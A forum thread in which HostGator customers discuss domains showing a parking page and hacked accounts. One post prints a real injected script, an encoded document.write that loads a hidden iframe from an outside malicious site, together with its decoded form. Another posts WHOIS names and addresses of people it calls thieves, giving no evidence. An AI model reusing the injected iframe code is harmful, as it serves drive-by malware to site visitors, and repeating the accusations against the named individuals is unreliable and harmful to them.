Hostgator Hosting Account Hacked!!

I am having the same problem. 19 of my 28 domains on my HostGator reseller account are now hijacked by searchportal.information.com (apparently one of their own domains), which is what comes up when any of the 19 domains' URLs are entered into the browser. One support ticket, two chats and 8 hours later, the problem is still ongoing. To top it off, HostGator asks for a customer survey after the non-productive chat sessions while the problems still exist. WTF?!?

It's bad enough that this happened but for it to not be fixed some 8 hours after being notified about it, is unacceptable. If this has happened before to others, why wasn't the problem fixed before it happened to me and probably others?

I think it is time for me to start looking at other hosting companies and definitely time to get out of the HostGator affiliate program. I can't recommend HostGator when this sort of security problem and significant downtime exists. Very, very disappointed in HostGator.

 

Well, it took a few hours but HostGator finally fixed the problems on their server. Still no explanation for what caused the domain hijacking by their search portal domain.

 

It wasn't a hijacking. Some entries were deleted either from the dns server or apache config files themselves which would cause the servers default page to show up. That in this case is searchportal.information.com

I have seen this happen before with cpanel upgrades and daemon upgrades. It is a very easy fix by just adding the entries back into the configs.

As for other ip's showing up. That could either be tech support or the admins logging into the cpanel to see what was up. I often did this when I worked there.

Most of the account hacks I've seen involved poor passwords, crappy scripts that allowed exploitation into the sites code or directories and scripts that were chmod to 777, not the servers fault.

 

My problems with my HostGator account and domains have been resolved. They were fixed the same day I notified them.

Thanks also to Brent Oxley, owner of HostGator, for following up and explaining what happened.

I will stay with HostGator due to the predominantly good experience I've had, and due to their attention and follow up on my recent and only trouble over my two years hosting with them.

I understand that they were having some trouble with system upgrades and apparently a temporary staffing problem delayed their response to my support requests. Even a good hosting company can stumble on occasion. It is the getting up and going again that makes the difference. So, go HostGator!

 

Arkh!! Got the same problem like you.
My Hostgator Cpanel hacked by someone.
Can't submit a ticket because I don't know where should I register my email there.
Anybody can guide me step by step on how to do this?

 

Phew. Luckily I got this email very fast during submitting ticket process.
This email really save my life and help me. Hope all of you will also got this message too.

Dear Username,

As you are aware, we did password resets a couple of months ago to ensure account
security.

We recently did another audit and found that your current password matches the password
that you used during sign up.  To ensure security, we are resetting the passwords of all
accounts that currently utilize the same password as when they signed up.

You may change your password afterwards, as long as it does not match your original
password.  We will continue auditing passwords on a daily basis and resetting those that
match the original password created during sign up.

This change affects your ( xxxxx ) account on our ( xx.xx.xx.xxx ) server.

In order to quickly and easily obtain your new password, please click on
the following link:

[url]https://secure.hostgator.com/password_reset/[/url]

Please ensure that all CPanel account passwords are different from the first registered
password. Otherwise, it will continue to be reset.

If you have any questions or problems, please direct all support inquires related to this
password concern to [email]passwords@hostgator.com[/email] or check out
[url]http://forums.hostgator.com/password-updates-t36306.html?p=132533#post132533[/url] and we will
do all that we can to assist you. Submitting your questions to this email will ensure that
you are assisted by representatives trained and able to assist you with password issues.

It is more than likely over the next few days that there will be some delays when
contacting us.  To ensure these changes go as smoothly as possible we are taking measures
in all staffing departments to accommodate the anticipated influx.  Rest assured we will
be working as diligently as possible to keep delays and wait times to a minimum.

We appreciate your patience and cooperation.

Best regards,
HostGator.com

Code (markup):

 

You will need to reset your password going to this link : https://secure.hostgator.com/password_reset/

I recived this email

Edited : Sorry, we posted on same time.

 

Recentely my hostgator account was hacked too. In all my domains the following script was put in my index.php and index.html files

<!-- o65 --><Script Language='Javascript'>
<!--
document.write(unescape('%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%57%49%44%54%48%3A%20%30%25%3B%20%48%45%49%47%48%54%3A%20%30%70%78%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%79%66%75%63%6B%69%6E%67%2D%70%75%73%73%79%2E%63%6F%6D%2F%74%79%72%65%6B%2F%3F%74%3D%35%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%30%20%73%63%72%6F%6C%6C%69%6E%67%3D%6E%6F%20%0A%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3E%3C%2F%49%46%52%41%4D%45%3E'));
//-->
</Script><!-- c65 -->

 

<!-- o65 --><Script Language='Javascript'>
<!--
document.write(unescape('<IFRAME style="WIDTH: 0%; HEIGHT: 0px" src="http://myfucking-pussy.com/tyrek/?t=5" frameBorder=0 scrolling=no
allowTransparency></IFRAME>'));
//-->
</Script><!-- c65 -->

I decode it for you. READ. I think hostgator.com is insecure

 

Hostgator is far from insecure. It is the users own 3rd party software that usually cause issues. There are exploits in Joomla, Wordpress, other CMS software and any other 3rd party software the client puts on the server might potentially be insecure and allow for a hack.

Believe me... I have seen many a person try and change permissions to 777 on all the files in their home directory. What do you expect will happen when you give everyone read/write/execute permissions?

 

I do not know about you, but 15 minutes of me paying Google PPC on 100 websites is alot of money especially when the clicks are upwards of 1.25 each! The whole search portal thing is a huge scam! they are hijacking everyones dns through a proxi scam! I found out who it is behind it. the information follows. Believe me it is more of a problem than you know.
It is also a huge "glitch" in Google PPC search and also Yahoo PPC programs. These people are theives! I suggest that you and everyone else take this provided info and run with it! If you have noticed the "searchportal.information.com" is a "fake" domain, and the true domain is "www.searchportal.com" the .information was "added" by the webmasters to try and cover up their true identities. AND YES IT IS VERY POSSIBLE THAT HOST GATOR IS INVLOVED!

Here are the Thugs:



62.110.173.117 I.P address

HIEBER, RICHARD email address
Aluffi, Cristiano email address
Domain servers in listed order:

SUN1.FABARIS.IT (their servers)
DNS2.FABARIS.IT


Administrative Contact:
HIEBER, RICHARD
Via San Godenzo 135
ROMA 00189
IT
PRIVATE fax: 123 123 1234

Technical Contact:
Aluffi, Cristiano
Via Goffredo Mameli, 90
Poggio Mirteto
RI 02047
IT
+39 0765 22181 fax: +39 0765 410100

Record expires on 13-Apr-2010.
Record created on 14-Apr-1998.
Database last updated on 24-Dec-2009 22:24:11 EST.

Domain servers in listed order:

SUN1.FABARIS.IT
DNS2.FABARIS.IT

 

Hostgator are not scammers nor are they cheaters. If you bought shared hosting then you have a higher chance of getting hacked/exploited. Though, if you get a tech staff to look over your site for any loophole and scan for any trojans. You should be fine.

 

check your php script and look for any mysterious code.
check meta tags in your files and your .htaccess file.

 

You're absolutely wrong.

Information.com is NOT a fake domain... Just look at the page source from any one of these domains and it clearly shows the source as coming from searchportal.information.com

Information.com is owned by Oversee.net who owns Moniker, SnapNames, and DomainSponsor. Also, HostGator is certainly involved, because they even stated it in this thread. They probably have a deal setup with Oversee to use this as their default parking page and then in turn they are able to monetize traffic. They claim to donate it to charity.

Either way, it's stealing. If I setup an addon domain and then change my nameservers, there is no reason it should display anything other than my site directory...

Also, the main reason I am upset about this is because it's quite possible it may cause legal troubles. I have a generic domain, which I intend to use for it's generic purpose. However, there is a trademark for the term in a completely unrelated industry. I recently added the domain to my Host Gator account and when I went to the site, what did I see? Advertisements for the trademark holder's products... If by some chance, I receive a UDRP notice, I will be EXTREMELY pissed, to say the least.

 

I've used Hostgator before and never had any problems with them but then again for the price you pay for shared hosting you really can't expect much more security because there is only so much they can do without limiting your site.

 

well ill take peachy dandy any day over hostgator

 

I have no problem with hostgator..Don't install anything script in your hosting because the hacker can attack your hosting anytime. Something script is sucks!

 

I have always been with hostgator hopefully I'm not on your shared server.

I have never had a problem with them and there support has always been fast, I hope their on top of this.

 

I were using Hosgator (shared) for 4 years on over 60 websites, never had such problems.